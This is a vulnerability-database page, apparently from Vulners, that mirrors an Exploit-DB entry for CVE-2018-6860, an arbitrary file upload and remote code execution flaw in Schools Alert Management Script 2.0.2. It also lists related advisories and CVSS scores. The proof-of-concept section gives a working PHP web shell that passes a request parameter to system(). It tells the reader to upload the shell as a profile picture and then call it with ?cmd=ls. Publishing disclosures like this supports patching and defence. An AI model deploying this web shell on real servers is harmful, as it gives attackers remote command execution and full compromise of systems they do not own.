Lucene search
K

Schools Alert Management Script 2.0.2 - Arbitrary File Upload

🗓️ 10 Feb 2018 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Schools Alert Management Script 2.0.2 Arbitrary File Upload & Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Schools Alert Management Script 2.0.2 - Arbitrary File Upload Vulnerability
10 Feb 201800:00
zdt
CNVD
PHP Scripts Mall Schools Alert Management Script File Upload Vulnerability
26 Feb 201800:00
cnvd
CVE
CVE-2018-6860
12 Feb 201803:00
cve
Cvelist
CVE-2018-6860
12 Feb 201803:00
cvelist
EUVD
EUVD-2018-18606
7 Oct 202500:30
euvd
NVD
CVE-2018-6860
12 Feb 201803:29
nvd
OSV
CVE-2018-6860
12 Feb 201803:29
osv
Packet Storm
Schools Alert Management Script 2.0.2 Arbitrary File Upload / Remote Code Execution
9 Feb 201800:00
packetstorm
Prion
Remote code execution
12 Feb 201803:29
prion
#################################################################################################################
# Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution
# Date: 07.02.2018
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 2.0.2
# Tested on: Linux Mint
# CVE: CVE-2018-6860
##################################################################################################################

Proof of Concept
=================
1. Login as Student/Parent
2. Go to "Edit Profile" to upload profile picture.
3. Once you find upload section, upload following code as a PHP file: 
    <?php
        if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }
    ?>
4. Try to access given PHP file : [site.com]/malicious.php?cmd=ls

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Feb 2018 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 26.5
CVSS 3.18.8
EPSS0.0252
34